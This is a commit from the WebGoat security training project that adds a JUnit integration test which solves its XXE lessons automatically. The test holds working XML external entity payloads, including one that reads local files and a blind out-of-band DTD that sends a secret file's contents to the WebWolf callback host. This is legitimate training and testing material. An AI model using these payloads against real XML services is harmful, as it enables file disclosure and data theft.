feat: Introduce Playwright for UI testing

Instead of using Robot Framework which does not run during a `mvn install`. Playwright seems to be the better approach. We can now write them as normal JUnit test and they are executed during a build. Additionally this PR solves some interesting bugs found during writing Playwright tests: - A reset of a lesson removes all assignments as a result another user wouldn't see any assignments - If someone solves an assignment the assignment automatically got solved for a new user since the assignment included the `solved` flag which immediately got copied to new lesson progress. - Introduction of assignment progress linking a assignment not directly to all users.
2025-01-26 16:59:59 +01:00
parent 9d5ab5fb21
commit 8e45316638
47 changed files with 599 additions and 281 deletions
--- a/src/it/java/org/owasp/webgoat/integration/XXEIntegrationTest.java
+++ b/src/it/java/org/owasp/webgoat/integration/XXEIntegrationTest.java
@ -0,0 +1,117 @@
+package org.owasp.webgoat.integration;
+
+import io.restassured.RestAssured;
+import io.restassured.http.ContentType;
+import java.io.IOException;
+import org.junit.jupiter.api.Test;
+
+public class XXEIntegrationTest extends IntegrationTest {
+
+  private static final String xxe3 =
+      """
+      <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE user [<!ENTITY xxe SYSTEM "file:///">]><comment><text>&xxe;test</text></comment>
+      """;
+  private static final String xxe4 =
+      """
+     <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE user [<!ENTITY xxe SYSTEM "file:///">]><comment><text>&xxe;test</text></comment>
+     """;
+  private static final String dtd7 =
+      """
+      <?xml version="1.0" encoding="UTF-8"?><!ENTITY % file SYSTEM "file:SECRET"><!ENTITY % all "<!ENTITY send SYSTEM 'WEBWOLFURL?text=%file;'>">%all;
+      """;
+  private static final String xxe7 =
+      """
+      <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "WEBWOLFURL/USERNAME/blind.dtd">%remote;]><comment><text>test&send;</text></comment>
+      """;
+
+  private String webGoatHomeDirectory;
+
+  // TODO fix me
+  //  /*
+  //   * This test is to verify that all is secure when XXE security patch is applied.
+  //   */
+  //  @Test
+  //  public void xxeSecure() throws IOException {
+  //    startLesson("XXE");
+  //    webGoatHomeDirectory = webGoatServerDirectory();
+  //    RestAssured.given()
+  //        .when()
+  //        .relaxedHTTPSValidation()
+  //        .cookie("JSESSIONID", getWebGoatCookie())
+  //        .get(url("service/enable-security.mvc"))
+  //        .then()
+  //        .statusCode(200);
+  //    checkAssignment(url("xxe/simple"), ContentType.XML, xxe3, false);
+  //    checkAssignment(url("xxe/content-type"), ContentType.XML, xxe4, false);
+  //    checkAssignment(
+  //        url("xxe/blind"),
+  //        ContentType.XML,
+  //        "<comment><text>" + getSecret() + "</text></comment>",
+  //        false);
+  //  }
+
+  /**
+   * This performs the steps of the exercise before the secret can be committed in the final step.
+   *
+   * @return
+   */
+  private String getSecret() {
+    String secretFile = webGoatHomeDirectory.concat("/XXE/" + getUser() + "/secret.txt");
+    String webWolfCallback = new WebWolfUrlBuilder().path("landing").attackMode().build();
+    String dtd7String = dtd7.replace("WEBWOLFURL", webWolfCallback).replace("SECRET", secretFile);
+
+    // upload DTD
+    RestAssured.given()
+        .when()
+        .relaxedHTTPSValidation()
+        .cookie("WEBWOLFSESSION", getWebWolfCookie())
+        .multiPart("file", "blind.dtd", dtd7String.getBytes())
+        .post(new WebWolfUrlBuilder().path("fileupload").build())
+        .then()
+        .extract()
+        .response()
+        .getBody()
+        .asString();
+
+    // upload attack
+    String xxe7String =
+        xxe7.replace("WEBWOLFURL", new WebWolfUrlBuilder().attackMode().path("files").build())
+            .replace("USERNAME", this.getUser());
+    checkAssignment(url("xxe/blind"), ContentType.XML, xxe7String, false);
+
+    // read results from WebWolf
+    String result =
+        RestAssured.given()
+            .when()
+            .relaxedHTTPSValidation()
+            .cookie("WEBWOLFSESSION", getWebWolfCookie())
+            .get(new WebWolfUrlBuilder().path("requests").build())
+            .then()
+            .extract()
+            .response()
+            .getBody()
+            .asString();
+    result = result.replace("%20", " ");
+    if (-1 != result.lastIndexOf("WebGoat 8.0 rocks... (")) {
+      result =
+          result.substring(
+              result.lastIndexOf("WebGoat 8.0 rocks... ("),
+              result.lastIndexOf("WebGoat 8.0 rocks... (") + 33);
+    }
+    return result;
+  }
+
+  @Test
+  public void runTests() throws IOException {
+    startLesson("XXE", true);
+    webGoatHomeDirectory = webGoatServerDirectory();
+    checkAssignment(url("xxe/simple"), ContentType.XML, xxe3, true);
+    checkAssignment(url("xxe/content-type"), ContentType.XML, xxe4, true);
+    checkAssignment(
+        url("xxe/blind"),
+        ContentType.XML,
+        "<comment><text>" + getSecret() + "</text></comment>",
+        true);
+    checkResults("XXE");
+  }
+}